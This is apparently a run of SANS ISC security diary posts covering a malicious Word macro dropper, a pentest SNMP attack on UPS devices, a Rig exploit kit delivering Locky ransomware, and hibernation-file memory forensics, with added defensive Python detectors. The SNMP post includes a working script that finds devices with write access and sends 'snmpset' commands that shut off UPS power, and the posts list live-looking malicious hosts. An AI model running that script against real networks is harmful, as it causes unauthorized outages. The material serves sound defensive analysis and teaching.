Diaries

Published: 2016-09-30

Another Day, Another Malicious Behaviour

Every day, we are spammed with thousands of malicious emails and attackers always try to find new ways to bypass the security controls. Yesterday, I detected a suspicious HTTP GET request:

GET /ork/install.zip?fid=484703180 HTTP/1.1
User-Agent: http://offensivereports.xyz/ork/install.zip?fid=48473180
Host: offensivereports.xyz

Just by reading the User-Agent string, you already know that this is something weird and it must be investigated. I downloaded the file which was indeed a ZIP archive and not a disguised PE file. But this time, the archive is protected with a password! The file MD5 is 55d620a29afc46de0a5cb2bebfd7968b and is reported as non-malicious by VT (normal: the files can't be extracted):

$ unzip -l install.zip
Archive:  install.zip
  Length     Date   Time    Name
 --------    ----   ----    ----
   439608  09-14-15 12:44   msvcp140.dll
   348160  04-28-16 09:15   msvcr71.dll
   676036  04-28-16 09:15   sqlite3.7.11.dll
   196608  04-28-16 09:15   ssleay32.dll
   488467  09-25-16 10:17   upd.exe
    88248  06-23-15 15:00   vcruntime140.dll
       57  09-22-16 22:19   x.Cmd
   466432  09-16-16 08:10   em.exe
   418304  09-16-16 08:31   fb.exe
   439808  09-26-16 12:27   ie.exe
  1011712  04-28-16 09:15   libeay32.dll
  2533907  09-26-16 13:55   msupd.exe
 --------                   -------
  7107347                   12 files

More checks in my log files revealed that the HTTP GET originated from a malicious Word document (MD5: 9f2264c60115cc6d1dd69a4348a26fb2 - unknown on VirusTotal). Let's have a deeper look at the file and the macros. It starts with a classic scenario, the user is enticed to enable macros to view the document. Note the look of the message which mimics a missing plug-in!

The document contains hidden data (a white font on a white background) which looks like Base64/XOR’d data:

The macro was heavily obfuscated to evade classic antivirus solutions, but a quick manual analysis revealed that the hidden data is extracted, decrypted and dumped to a file in a random directory with a random filename (3 letters for the directory and 2 letters for the filename): %LOCALAPPDATA%\Temp\xxx\xx.cmd.

Here are some other indicators extracted by olevba.py:

+------------+---------------+-----------------------------------------+
| Type       | Keyword       | Description                             |
+------------+---------------+-----------------------------------------+
| AutoExec   | AutoOpen      | Runs when the Word document is opened   |
| AutoExec   | Workbook_Open | Runs when the Excel Workbook is opened  |
| Suspicious | Open          | May open a file                         |
| Suspicious | Shell         | May run an executable file or a system  |
|            |               | command                                 |
| Suspicious | MkDir         | May create a directory                  |
| Suspicious | Binary        | May read or write a binary file (if     |
|            |               | combined with Open)                     |
| Suspicious | CreateObject  | May create an OLE object                |
| Suspicious | Chr           | May attempt to obfuscate specific       |
|            |               | strings                                 |
| Suspicious | Xor           | May attempt to obfuscate specific       |
|            |               | strings                                 |
| Suspicious | Environ       | May read system environment variables   |
| Suspicious | Put           | May write to a file (if combined with   |
|            |               | Open)                                   |
+------------+---------------+-----------------------------------------+

The created file 'xx.cmd' is a PE file (MD5: 9b8af9042b8f357e17e6609aa5d0dc7d) also unknown on VT. The file is executed by the macro using a Shell() command. It performs the following actions:

  • It downloads the ZIP file mentioned above
  • It extracts the content on the file system in %PROGRAMDATA%
  • It executes 'msupd.exe' (extracted from the archive - see the content above)
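Three things in this chain can be checked mechanically without a password: a User-Agent that is itself a URL, a ZIP whose entries carry the "encrypted" flag (visible in the clear in every local file header, which is exactly why VT could not extract it), and a '.cmd' file that is really a PE image. The block below is an added example, not tooling from the diary; the HTTP request is the one shown above, while the ZIP and PE bytes are constructed stand-ins, not the real samples.

```python
"""Triage checks for the three oddities in this diary: a URL used as the
User-Agent, a password-protected ZIP (encrypted entries) and a '.cmd' file
that is really a PE executable. Added example, not the diary's own tooling.
The ZIP and PE bytes below are constructed stand-ins, not the real files."""
import re
import struct

# PKZIP local file header: sig, version, flags, method, time, date, crc,
# compressed size, uncompressed size, name length, extra length (30 bytes).
LOCAL_HDR = struct.Struct("<IHHHHHIIIHH")
LOCAL_SIG = 0x04034B50
FLAG_ENCRYPTED = 0x0001        # general-purpose bit 0: entry is password protected
FLAG_DATA_DESCRIPTOR = 0x0008  # bit 3: sizes live in a trailing descriptor

SCRIPT_EXTS = {"cmd", "bat", "vbs", "txt"}


def user_agent_is_url(raw_request: str) -> bool:
    """True when the User-Agent header of a raw HTTP request is itself a URL,
    as in the request that started this investigation."""
    m = re.search(r"^User-Agent:\s*(.+?)\s*$", raw_request, re.M | re.I)
    return bool(m and re.match(r"https?://", m.group(1), re.I))


def zip_entries(data: bytes):
    """Walk the local file headers and yield (name, encrypted) per entry.
    No password is needed: the flag bit is in the clear, which is what lets a
    gateway notice an archive it will not be able to inspect."""
    off = 0
    while off + LOCAL_HDR.size <= len(data):
        (sig, _ver, flags, _method, _time, _date, _crc,
         csize, _usize, name_len, extra_len) = LOCAL_HDR.unpack_from(data, off)
        if sig != LOCAL_SIG:           # reached the central directory
            break
        if flags & FLAG_DATA_DESCRIPTOR and csize == 0:
            raise ValueError("streamed entry: size is in a trailing data descriptor")
        name_start = off + LOCAL_HDR.size
        name = data[name_start:name_start + name_len].decode("cp437")
        yield name, bool(flags & FLAG_ENCRYPTED)
        off = name_start + name_len + extra_len + csize


def encrypted_entries(data: bytes) -> list:
    return [name for name, enc in zip_entries(data) if enc]


def is_pe(data: bytes) -> bool:
    """MZ header and a 'PE\\0\\0' signature at e_lfanew (offset 0x3C)."""
    if len(data) < 0x40 or data[:2] != b"MZ":
        return False
    e_lfanew = struct.unpack_from("<I", data, 0x3C)[0]
    return data[e_lfanew:e_lfanew + 4] == b"PE\0\0"


def extension_masquerade(filename: str, data: bytes) -> bool:
    """A script-looking name (xx.cmd) carrying a PE image."""
    ext = filename.lower().rsplit(".", 1)[-1]
    return ext in SCRIPT_EXTS and is_pe(data)


# ---- constructed samples ----
def make_stored_zip(entries, encrypted: bool) -> bytes:
    """Build a minimal ZIP (local headers only, stored method, no central
    directory). With encrypted=True only the flag is set; the bytes are not
    actually ciphered, which is enough to exercise the parser."""
    out = bytearray()
    for name, payload in entries:
        flags = FLAG_ENCRYPTED if encrypted else 0
        out += LOCAL_HDR.pack(LOCAL_SIG, 20, flags, 0, 0, 0, 0,
                              len(payload), len(payload), len(name), 0)
        out += name.encode("cp437") + payload
    return bytes(out)


FAKE_PE = bytearray(0x44)               # constructed: MZ stub + PE signature only
FAKE_PE[:2] = b"MZ"
FAKE_PE[0x3C:0x40] = struct.pack("<I", 0x40)
FAKE_PE[0x40:0x44] = b"PE\0\0"
FAKE_PE = bytes(FAKE_PE)

SAMPLE_REQUEST = (                      # the request quoted in the diary
    "GET /ork/install.zip?fid=484703180 HTTP/1.1\r\n"
    "User-Agent: http://offensivereports.xyz/ork/install.zip?fid=48473180\r\n"
    "Host: offensivereports.xyz\r\n\r\n"
)
# file names from the unzip listing above; contents are placeholders
SAMPLE_ZIP = make_stored_zip(
    [("upd.exe", FAKE_PE), ("x.Cmd", b"@echo off\r\n"), ("msupd.exe", FAKE_PE)],
    encrypted=True,
)

if __name__ == "__main__":
    print("User-Agent is a URL:", user_agent_is_url(SAMPLE_REQUEST))
    print("encrypted entries:", encrypted_entries(SAMPLE_ZIP))
    print("xx.cmd is PE:", extension_masquerade("xx.cmd", FAKE_PE))
```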

The next step was to get the files from the ZIP archive. The .cmd PE file was not obfuscated and contained a lot of strings. I created a dictionary based on those strings and started a dictionary attack against the archive, without success. I then tried a brute-force attack with a password length estimated at 3 to 8 characters and was lucky: the password was found in a few seconds (a weak 3-character password). Here are the MD5 hashes of the extracted files:

$ md5sum *
MD5 (em.exe) = bae5851b1ea539b16800f5bdaded3a68
MD5 (fb.exe) = 38ff837f504f63e04491682e96447cdb
MD5 (ie.exe) = a8107e664bfbee36653bcdcff37afa00
MD5 (libeay32.dll) = 177bda0c92482dfa2c162a3750932b9c
MD5 (msupd.exe) = 8e402be9c03d288a5aee9565143632bc
MD5 (msvcp140.dll) = 1d8c79f293ca86e8857149fb4efe4452
MD5 (msvcr71.dll) = 86f1895ae8c5e8b17d99ece768a70732
MD5 (sqlite3.7.11.dll) = f45ed79fee632e407831fbebc51fc063
MD5 (ssleay32.dll) = 5023f4c4aaaa1b6e9d992d6bbdcd340b
MD5 (upd.exe) = 6c66d7c6a3718d515370709a9f06f4a6
MD5 (vcruntime140.dll) = c2bbcb5aae069c22711d8e49d6107401
MD5 (x.Cmd) = f97253ff3c80b94fa2efb9e5ab1808db

Only the file 'em.exe' is reported as malicious by VT[1]. The 'msupd.exe' file has the original name 'setup.exe' and is reported as a Microsoft Setup Bootstrap[2] file:

It enumerates the processes, starts a keylogger, deploys and executes the other PE files (like any Windows installer):

C:\ProgramData\ie.exe" -f "C:\ProgramData\bigchunk\ie.txt
C:\ProgramData\em.exe, -f "C:\ProgramData\bigchunk\em.txt"
C:\ProgramData\fb.exe" -f "C:\ProgramData\bigchunk\fb.txt

Those files are common tools to collect email passwords (em.exe), browser passwords (ie.exe) and social network passwords (fb.exe).

But the funny stuff was for sure the notification sent via email to the attacker. Here is a dump of the SMTP session recorded:

220 s37.linuxpl.com ESMTP Server
EHLO SystemIT
250-s37.linuxpl.com Hello xxxxxxxx [x.x.x.x]
250-SIZE 104857600
250-8BITMIME
250-PIPELINING
250-AUTH PLAIN LOGIN
250-STARTTLS
250 HELP
AUTH PLAIN xxxxxxxxxxx
235 Authentication succeeded
AUTH LOGIN
503 already authenticated
MAIL FROM: SIZE=345
250 OK
RCPT TO:
250 Accepted
DATA
354 Enter message, ending with "." on a line by itself
From: reports@offensivereports.xyz
To: xxxxxxxx@gmail.com
Date: Thu, 29 Sep 2016 08:20:36 +0100
Subject: Installed 169.254.100.7[SystemIT]
X-mailer: Synapse - Delphi & Kylix TCP/IP library by Lukas Gebauer

Sucessfully installed. Remote remove code: xxxxxxxxxxxxxxxxxxxxxxx Check FAQ to know how remotely uninstall software
.
250 OK id=1bpV6a-0003zu-98
QUIT
221 s37.linuxpl.com closing connection

Now I have the attacker's email address and credentials to use his mail server!

Sadly, the attack was not completely successful in my sandbox environment and no data (the collected credentials) was exfiltrated. I did not detect any traffic to the Wild Internet... As you can see, attackers are always trying to find ways to bypass security controls (password-protected archives, generic Microsoft tools, etc.).

Stay safe!

[1] https://www.virustotal.com/en/file/2e149eae2956d2d749110f803044ff8b252dcbaf3ae09bdcf30a58b74bbd7329/analysis/
[2] https://www.microsoft.com/en-us/download/details.aspx?id=24556

Xavier Mertens (@xme)
ISC Handler - Freelance Security Consultant

Published: 2016-09-28

SNMP Pwn3ge

Sometimes getting access to company assets is very complicated. Sometimes it is much easier (read: too easy) than expected. If one of the goals of a pentester is to get juicy information about the target, preventing the IT infrastructure from running efficiently (denial of service) is also a "win". Indeed, in some business fields, if the infrastructure is not running, the business is impacted and the company may lose a lot of money. Think about traders.

I was recently involved in a pentest whose goal was to test the customer's internal network. The scope was easy: come on site, connect your laptop to a free network port and see what you can find/do. In such a scenario, the breaking point is to successfully get connected to the network. If Mr "DHCP" is kind enough to provide you an IP address, you are "in" and you may consider the network as already compromised. This was the case for me: no protection against rogue devices, no network access control. I launched my Ettercap and started to sniff some packets while playing MitM. I immediately grabbed some nice SNMP packets with interesting communities like "public" and "private". As you probably know, those are the default ones on many systems. "public" usually provides read-only access and "private" is used in read-write mode. Often, I hear this comment: "But SNMP is just a monitoring protocol, why should I care?". Wrong! SNMP, as described by RFC 3411[1], means "Simple Network Management Protocol" and not "Monitoring Protocol". If you have SNMP read access to a device, you can collect interesting information (version, processes, IP information, health) for the reconnaissance phase. But if you have SNMP write access to a device, you can alter its configuration and cause much more damage.

During my engagement, the next step was to find devices with SNMP write capabilities:

# nmap -Pn -sU -p 161 -v -oA snmp 192.168.1.0/24
# grep '161/open/udp' snmp.gnmap | awk '{ print $2 }' | while read IP
do
     snmpwalk -v1 -c private "$IP" >/dev/null 2>&1
     if [ "$?" -eq 0 ]; then
         echo "$IP accepts private community"
         echo "$IP" >>vulnerable_ip.tmp
     fi
done

The next step was to identify the vulnerable devices. This information is discoverable with the OID .1.3.6.1.2.1.1.1.0 (sysDescr). Example:

# snmpwalk -v1 -On -c xxxxxxxxx 192.168.254.4 SNMPv2-MIB::sysDescr.0
.1.3.6.1.2.1.1.1.0 = STRING: Cisco IOS Software, C1600 Software (AP1G2-K9W7-M), Version 15.2(2)JB2, RELEASE SOFTWARE (fc1)

Guess what? Most vulnerable devices were UPS management systems configured with default settings or, more precisely, not configured at all. The next step was to browse the vendor MIB ("Management Information Base"). The vendor ID was 534, which is assigned to Eaton Corporation [2]. The MIB reveals some interesting read/write OIDs like this one: 1.3.6.1.4.1.534.1.9.1. This OID is called "xupsControlOutputOffDelay". Here is the description:

"Setting this value to other than zero will cause the UPS output to turn off after the number of seconds. Setting it to 0 will cause an attempt to abort a pending shutdown."

We are close to performing a nice DoS against the customer's infrastructure. How? A simple 'snmpset' command will do. Let's wrap it in a small script:

for IP in $(cat vulnerable_ip.tmp)
do
   snmpset -c private -v1 $IP 1.3.6.1.4.1.534.1.9.1 i 10
   echo -n $IP
   d=10
   while [ $d -gt 0 ]; do echo -n '.'; d=$((d-1)); sleep 1; done
   echo "Tango down!"
done

Game over! Note that this is a proof of concept. In most pentest engagements, you're not allowed to perform such actions.
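The defender's counterpart to the sniffing above is to decode SNMPv1 datagrams off the wire (or from a capture) and alert on exactly two things: a default community string in use, and any SetRequest, since a write PDU is what turns "monitoring" into the DoS just described. The block below is an added example, not the author's tooling; it is a minimal BER/SNMPv1 encoder and parser, the datagrams are constructed with the encoder (the community 'r0-m0nit0r' is invented), and nothing is sent on the network.

```python
"""Passive SNMPv1 inspector: decode one captured datagram and report what a
defender should alert on from the engagement above, a default community string
and any SetRequest (write) PDU. Added example, not the author's tooling; the
datagrams at the bottom are constructed with the encoder here, not captured."""

DEFAULT_COMMUNITIES = {"public", "private"}
PDU_NAMES = {0xA0: "GetRequest", 0xA1: "GetNextRequest",
             0xA2: "GetResponse", 0xA3: "SetRequest"}

# ---- BER primitives (definite lengths only, which is all SNMP uses) ----
def _length(n: int) -> bytes:
    if n < 0x80:
        return bytes([n])
    body = n.to_bytes((n.bit_length() + 7) // 8, "big")
    return bytes([0x80 | len(body)]) + body

def tlv(tag: int, body: bytes) -> bytes:
    return bytes([tag]) + _length(len(body)) + body

def encode_int(v: int) -> bytes:
    return tlv(0x02, v.to_bytes(max(1, (v.bit_length() + 8) // 8), "big", signed=True))

def encode_oid(dotted: str) -> bytes:
    arcs = [int(a) for a in dotted.strip(".").split(".")]
    out = bytearray([arcs[0] * 40 + arcs[1]])
    for arc in arcs[2:]:                 # base-128 digits, high bit = more follow
        chunk = [arc & 0x7F]
        arc >>= 7
        while arc:
            chunk.append(0x80 | (arc & 0x7F))
            arc >>= 7
        out.extend(reversed(chunk))
    return tlv(0x06, bytes(out))

def read_tlv(buf: bytes, off: int):
    """Return (tag, body, offset after the TLV) for the element at off."""
    tag, ln, off = buf[off], buf[off + 1], off + 2
    if ln & 0x80:                        # long form: next n bytes hold the length
        n = ln & 0x7F
        ln, off = int.from_bytes(buf[off:off + n], "big"), off + n
    return tag, buf[off:off + ln], off + ln

def decode_oid(body: bytes) -> str:
    arcs, val = [body[0] // 40, body[0] % 40], 0   # correct for first arc 0 or 1
    for b in body[1:]:
        val = (val << 7) | (b & 0x7F)
        if not b & 0x80:
            arcs.append(val)
            val = 0
    return ".".join(map(str, arcs))

# ---- SNMPv1 message = SEQUENCE { INTEGER version(0), OCTET STRING community, PDU } ----
def build_snmpv1(community: str, pdu_tag: int, varbinds, request_id: int = 1) -> bytes:
    """varbinds: list of (dotted OID, already BER-encoded value)."""
    vbl = b"".join(tlv(0x30, encode_oid(oid) + val) for oid, val in varbinds)
    pdu = tlv(pdu_tag, encode_int(request_id) + encode_int(0) + encode_int(0) + tlv(0x30, vbl))
    return tlv(0x30, encode_int(0) + tlv(0x04, community.encode()) + pdu)

def parse_snmpv1(pkt: bytes) -> dict:
    tag, msg, _ = read_tlv(pkt, 0)
    if tag != 0x30:
        raise ValueError("not a BER SEQUENCE")
    _, ver, off = read_tlv(msg, 0)
    _, comm, off = read_tlv(msg, off)
    pdu_tag, pdu, _ = read_tlv(msg, off)
    off = 0
    for _ in range(3):                   # request-id, error-status, error-index
        _, _, off = read_tlv(pdu, off)
    _, vbl, _ = read_tlv(pdu, off)
    oids, off = [], 0
    while off < len(vbl):                # each varbind: SEQUENCE { OID, value }
        _, vb, off = read_tlv(vbl, off)
        _, oid, _ = read_tlv(vb, 0)
        oids.append(decode_oid(oid))
    return {"version": int.from_bytes(ver, "big", signed=True),
            "community": comm.decode(errors="replace"),
            "pdu": PDU_NAMES.get(pdu_tag, hex(pdu_tag)), "oids": oids}

def assess(pkt: bytes) -> list:
    """Findings worth an alert: a default community, or any write attempt."""
    p = parse_snmpv1(pkt)
    findings = []
    if p["community"] in DEFAULT_COMMUNITIES:
        findings.append("default community '%s'" % p["community"])
    if p["pdu"] == "SetRequest":
        findings.append("SetRequest to " + ", ".join(p["oids"]))
    return findings

# ---- constructed datagrams (no traffic is sent anywhere) ----
XUPS_OUTPUT_OFF_DELAY = "1.3.6.1.4.1.534.1.9.1"   # the Eaton OID quoted above
SYS_DESCR = "1.3.6.1.2.1.1.1.0"
NULL = tlv(0x05, b"")
SET_PRIVATE = build_snmpv1("private", 0xA3, [(XUPS_OUTPUT_OFF_DELAY, encode_int(10))])
GET_PUBLIC = build_snmpv1("public", 0xA0, [(SYS_DESCR, NULL)])
GET_CUSTOM = build_snmpv1("r0-m0nit0r", 0xA0, [(SYS_DESCR, NULL)])   # invented community
```

Feed `assess()` the UDP payload of each port 161 datagram from a capture; SNMPv2c differs only in the version integer (1) and extra PDU tags, SNMPv3 is a different message format and is not parsed here.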

It is a pity that such a simple attack is still possible in 2016! If the customer had followed the SANS Top-20 controls[3], this attack wouldn't have been possible:

  • CSC1 - Inventory of authorized and unauthorized devices
  • CSC4 - Continuous vulnerability scanning, assessment, and remediation
  • CSC9 - Limitation and control of network ports, protocols, and services
  • CSC11 - Secure configuration for network devices such as firewalls, routers, and switches

[1] https://www.ietf.org/rfc/rfc3411.txt
[2] https://www.iana.org/assignments/enterprise-numbers/enterprise-numbers
[3] https://www.sans.org/media/critical-security-controls/critical-controls-poster-2016.pdf

Xavier Mertens (@xme)
ISC Handler - Freelance Security Consultant

Published: 2016-09-28

Rig Exploit Kit from the Afraidgate Campaign

Introduction

Yesterday on Tuesday 2016-09-27, the Afraidgate campaign switched from Neutrino exploit kit (EK) to Rig EK [1].  As we go into Wednesday 2016-09-28, this trend continues.

So let's examine another case of Afraidgate using Rig EK!

Details

The Afraidgate campaign has been sending Locky since it stopped distributing CryptXXX ransomware in mid-July 2016 [2].  Afraidgate started using Neutrino EK after Angler EK disappeared in early June 2016 [3].

Currently, Afraidgate is using Rig EK, and it's distributing the newest variant of Locky ransomware.  This newest variant is called "Odin" because of the .odin file extension Locky is now using for its encrypted files [4].

The image below shows the current chain of events since Afraidgate switched to Rig EK.


Shown above:  Afraidgate campaign chain of events.

Infection traffic


Shown above:  Traffic from today's infection filtered in Wireshark.

Indicators from this traffic are:

  • www.allthingsbritish.net - Compromised site
  • 139.59.171.176 port 80 - story.opiniaonline.ro - Afraidgate redirect
  • 195.133.201.49 port 80 - art.unknownproject.com - Rig EK
  • crocotan.com - failed DNS query from Locky downloader to get Locky
  • 45.32.144.151 port 80 - findidlist.com - Locky downloader grabbing Locky
  • kdbbpmrdfnlno.pl - failed DNS query from the Locky ransomware
  • kgijxdracnyjxh.biz - failed DNS query from the Locky ransomware
  • vgcfwrnfrkkarc.work - failed DNS query from the Locky ransomware
  • ehkhxyvvcpk.biz - failed DNS query from the Locky ransomware
  • rluqypf.pw - failed DNS query from the Locky ransomware
  • wfgtoxqbf.biz - failed DNS query from the Locky ransomware
  • ndyevynuwqe.su - failed DNS query from the Locky ransomware
  • dceaordeoe.ru - failed DNS query from the Locky ransomware
  • jlhxyspgvwcnjb.work - failed DNS query from the Locky ransomware
  • gisydkcsxosyokkuv.work - failed DNS query from the Locky ransomware
  • ufyjlxiscap.info - failed DNS query from the Locky ransomware

In the image below, injected script is highlighted in a page from the compromised site.  This script kicked off the infection chain by generating HTTP traffic to a gate.  Checking the domain registration, we see the gate's name servers are from afraid.org, which is a common characteristic for gates used by this campaign.


Shown above:  Injected script in a page from the compromised website.

Next, the Afraidgate URL returned script with an iframe that pointed to a Rig EK landing page.


Shown above:  The Afraidgate URL redirecting to a Rig EK landing page.

Rig EK has gone through some changes in recent weeks.  Earlier this month, I noticed the landing page for Rig EK included a large amount of non-ASCII characters.  That was also the case today.


Shown above:  An example of a Rig EK landing page.

The Rig EK Flash exploits are now around 25 kB in size.


Shown above:  Rig EK sends a Flash exploit.

The Rig EK payload is now encoded with an encryption algorithm.  Previously, Rig EK used a more straightforward method of XOR-ing the binary with an ASCII string.  Now the payload is more heavily obfuscated.  In this case, the payload was a downloader for Locky.


Shown above:  Rig EK sends the malware payload.

After Rig EK sent the Locky downloader, that downloader grabbed Locky.  In the traffic, we see a fake user agent and fake content type in the HTTP headers.  The Locky binary was also encoded as it came across the network.


Shown above:  Locky downloader retrieves Locky.

A closer look at the traffic shows findidlist.com wasn't the first domain the infected host tried when downloading the Locky binary.  Crocotan.com was tried first, but that domain has apparently been taken offline.

After Locky was downloaded, the infected host generated several DNS queries for other domains, presumably for the Locky post-infection callback.  None of those DNS queries were successful.


Shown above:  Lots of failed DNS queries.
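Even when the callback never succeeds, the burst of failed lookups above is itself a usable detection signal. The block below is an added example, not from the diary: it runs a sliding window over resolver log lines and flags any client that gets several NXDOMAIN answers for random-looking names within a minute. The log lines are constructed (query names reuse the failed lookups listed above; the client addresses, timestamps and the 'epoch client qname rcode' format are invented, so adapt the regex to your resolver).

```python
"""Spot the post-infection pattern seen above: one host bursting NXDOMAIN answers
for random-looking domains. Added example, not from the diary; the log lines are
constructed (query names reuse the failed lookups listed above, the client
addresses and timestamps are invented) and the format 'epoch client qname rcode'
is assumed, so adapt the regex to your resolver's log."""
import math
import re
from collections import Counter, defaultdict

LINE_RE = re.compile(r"^(?P<ts>\d+) (?P<client>[\d.]+) (?P<qname>[\w.-]+) (?P<rcode>\w+)$")


def entropy(s: str) -> float:
    """Shannon entropy in bits per character."""
    n = len(s)
    return -sum(c / n * math.log2(c / n) for c in Counter(s).values())


def looks_random(qname: str) -> bool:
    """Crude DGA heuristic on the first label: long, high entropy, few vowels.
    Thresholds are illustrative; tune them on your own traffic."""
    label = qname.split(".")[0]
    if len(label) < 7:
        return False
    vowels = sum(ch in "aeiou" for ch in label)
    return entropy(label) >= 2.5 and vowels / len(label) < 0.35


def find_nxdomain_bursts(lines, window: int = 60, threshold: int = 5) -> dict:
    """Map client -> sorted random-looking names, for every client that got at
    least `threshold` NXDOMAIN answers for such names within `window` seconds."""
    events = defaultdict(list)
    for line in lines:
        m = LINE_RE.match(line.strip())
        if not m or m["rcode"] != "NXDOMAIN" or not looks_random(m["qname"]):
            continue
        events[m["client"]].append((int(m["ts"]), m["qname"]))
    hits = {}
    for client, evs in events.items():
        evs.sort()
        start = 0
        for end in range(len(evs)):                 # sliding window over time
            while evs[end][0] - evs[start][0] > window:
                start += 1
            if end - start + 1 >= threshold:
                hits[client] = sorted({q for _, q in evs})
                break
    return hits


# constructed resolver log: 10.0.0.7 plays the infected host, 10.0.0.5 a clean one
SAMPLE_LOG = """\
1475000000 10.0.0.7 www.allthingsbritish.net NOERROR
1475000003 10.0.0.7 findidlist.com NOERROR
1475000010 10.0.0.7 kdbbpmrdfnlno.pl NXDOMAIN
1475000011 10.0.0.7 kgijxdracnyjxh.biz NXDOMAIN
1475000012 10.0.0.7 vgcfwrnfrkkarc.work NXDOMAIN
1475000013 10.0.0.7 ehkhxyvvcpk.biz NXDOMAIN
1475000014 10.0.0.7 rluqypf.pw NXDOMAIN
1475000015 10.0.0.7 wfgtoxqbf.biz NXDOMAIN
1475000020 10.0.0.5 intranetportal.corp NXDOMAIN
1475000021 10.0.0.5 www.example.test NOERROR
"""

if __name__ == "__main__":
    for client, names in find_nxdomain_bursts(SAMPLE_LOG.splitlines()).items():
        print(client, "->", ", ".join(names))
```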

The infected host

Even though Locky wasn't able to perform its post-infection callback, the victim host was still infected.  File extensions were .odin for the encrypted files, so this is the most recent variant of Locky (the "Odin" variant).


Shown above:  Desktop of the infected host.

Checking the Locky Decryptor page revealed the ransom instructions.  As we've often seen with Locky from the Afraidgate campaign, the ransom was 1.5 bitcoin, which as of today is approximately 908 US dollars.


Shown above:  The Locky decryptor page from this infection.

Malware info

The following artifacts were recovered from the infected host:

Rig EK payload (Downloader for Locky):

  • SHA256 hash: 624568125153d786e21927182b141cd8fe7fd4e97b7eb8b1933b8663bf3652ad
  • Size: 48,640 bytes
  • Location: C:\Users\[username]\AppData\Local\Temp\radA62C2.tmp.exe
  • Location: C:\Users\[username]\AppData\Roaming\rgV54QW5xRCUNWS.exe

Locky samples pulled from the infected host:

  • SHA256 hash: d4fd2fe61b13c70740ebc900e8d88123683790a43dd500e0f660f92e9fa257dc
  • Size: 181,760 bytes
  • Location: C:\Users\[username]\AppData\Local\Temp\d36y0wsMOkSrfEYreNRih1M0U.exe
  • Location: C:\Users\[username]\AppData\Local\Temp\Q5ABR5opm4BFjnrbzzuUX9nAd.exe

Final words

Locky ransomware continues to be an evolving threat.  Not only do we see it from near-daily waves of malicious spam (malspam), we also see it distributed in a more stealthy manner through EKs.  The Afraidgate campaign is currently the biggest EK-based campaign distributing Locky.

As always, properly-administered Windows hosts are not likely to be infected.  As long as your Windows host is up-to-date and fully patched, your risk is minimal.  If you're running Windows 10, I doubt you have anything to worry about.

But apparently enough out-of-date Windows hosts browse the web, so this campaign is profitable for the criminal group behind it.

Pcap and malware for this diary are located here.

---
Brad Duncan
brad [at] malware-traffic-analysis.net

References:

[1] http://www.malware-traffic-analysis.net/2016/09/27/index.html
[2] http://researchcenter.paloaltonetworks.com/2016/07/unit42-afraidgate-major-exploit-kit-campaign-switches-from-cryptxxx-ransomware-back-to-locky/
[3] http://malware.dontneedcoffee.com/2016/06/is-it-end-of-angler.html
[4] https://blog.opendns.com/2016/09/26/odin-lockys-latest-persona/


Published: 2016-09-27

Back in Time Memory Forensics

 

You might get into a case where you have only the disk image without having the memory image. Or you might have the memory image but wish you had one from some time back. With the hibernation file (hiberfil.sys), the page file (pagefile.sys) and crash dumps, that might be possible. And if you are lucky enough, you might be able to recover them from Volume Shadow Copies, which are enabled by default in most modern Windows versions. From a forensic point of view, the hibernation file is the most useful of these.

“hiberfil.sys is the file used by default by Microsoft Windows to save the machine's state as part of the hibernation process. The operating system also keeps an open file handle to this file, so no user, including the Administrator, can read the file while the system is running.”[1]

If you have a disk image of Windows Vista or later, you can check whether you have a previous copy of hiberfil.sys through the Volume Snapshot Service (aka Shadow Copy). That copy might date from before a malware infection or compromise, or it might contain artifacts that were deleted since.

If you would like to check your image for previous versions of hiberfil.sys and restore them, you can use libvshadow by Joachim Metz[2].

Once you have recovered the desired version of hiberfil.sys, note that while the Volatility framework can examine hiberfil.sys directly, that is very slow and it is better to convert it first to a raw memory image.

vol.py -f hiberfil.sys --profile=Win7SP1x64 imagecopy -O rawimage.img

In the above example I used the imagecopy plugin to do the conversion; you have to specify the exact Windows version with the service pack level. Another option is using hibr2bin.exe by Matt Suiche.[3]

Now let’s examine our image

vol.py -f rawimage.img --profile=Win7SP1x64 pslist

Volatility Foundation Volatility Framework 2.4
Offset(V)          Name                    PID   PPID   Thds     Hnds   Sess  Wow64 Start                          Exit
------------------ -------------------- ------ ------ ------ -------- ------ ------ ------------------------------ ------------------------------
0xfffffa800ccca9e0 System                    4      0    112      567 ------      0 2012-03-15 22:34:19 UTC+0000
0xfffffa800d2b5b30 smss.exe                228      4      3       35 ------      0 2012-03-15 22:34:19 UTC+0000
0xfffffa800e8862f0 csrss.exe               352    344      9      869      0      0 2012-03-15 22:34:44 UTC+0000
0xfffffa800cd049f0 csrss.exe               404    396      9       78      1      0 2012-03-15 22:34:49 UTC+0000
0xfffffa800e9a8060 wininit.exe             436    344      3       77      0      0 2012-03-15 22:34:49 UTC+0000
0xfffffa800e9a7860 winlogon.exe            444    396      4       94      1      0 2012-03-15 22:34:49 UTC+0000
0xfffffa800e9df060 services.exe            508    436      9      274      0      0 2012-03-15 22:34:55 UTC+0000
0xfffffa800e9e3850 lsass.exe               516    436      8      942      0      0 2012-03-15 22:34:56 UTC+0000
0xfffffa800e9ea910 lsm.exe                 524    436     14      311      0      0 2012-03-15 22:34:56 UTC+0000
0xfffffa800ea45860 svchost.exe             612    508     11      375      0      0 2012-03-15 22:35:05 UTC+0000
0xfffffa800ea779f0 svchost.exe             688    508     11      364      0      0 2012-03-15 22:35:08 UTC+0000
0xfffffa800ea94b30 LogonUI.exe             764    444      8      201      1      0 2012-03-15 22:35:09 UTC+0000
0xfffffa800eaa8b30 svchost.exe             772    508     22      522      0      0 2012-03-15 22:35:09 UTC+0000
0xfffffa800eaceb30 svchost.exe             832    508     21      517      0      0 2012-03-15 22:35:10 UTC+0000
0xfffffa800ead2b30 svchost.exe             856    508     45     1402      0      0 2012-03-15 22:35:10 UTC+0000
0xfffffa800eb16b30 svchost.exe             972    508     22      395      0      0 2012-03-15 22:35:12 UTC+0000
0xfffffa800eb4d730 svchost.exe             292    508     25      697      0      0 2012-03-15 22:35:14 UTC+0000
0xfffffa800eb51b30 spoolsv.exe             924    508     14      337      0      0 2012-03-15 22:35:26 UTC+0000
0xfffffa800ebd5820 svchost.exe             360    508     21      332      0      0 2012-03-15 22:35:27 UTC+0000
0xfffffa800ec5e650 FireSvc.exe            1168    508     21      349      0      0 2012-03-15 22:35:32 UTC+0000

And let's check the network connections:

vol.py -f rawimage.img --profile=Win7SP1x64 netscan

Volatility Foundation Volatility Framework 2.4
Offset(P)          Proto    Local Address                  Foreign Address      State            Pid      Owner          Created
0x3636300          UDPv4    0.0.0.0:0                      *:*                                   3736     Skype.exe      2012-04-06 13:09:31 UTC+0000
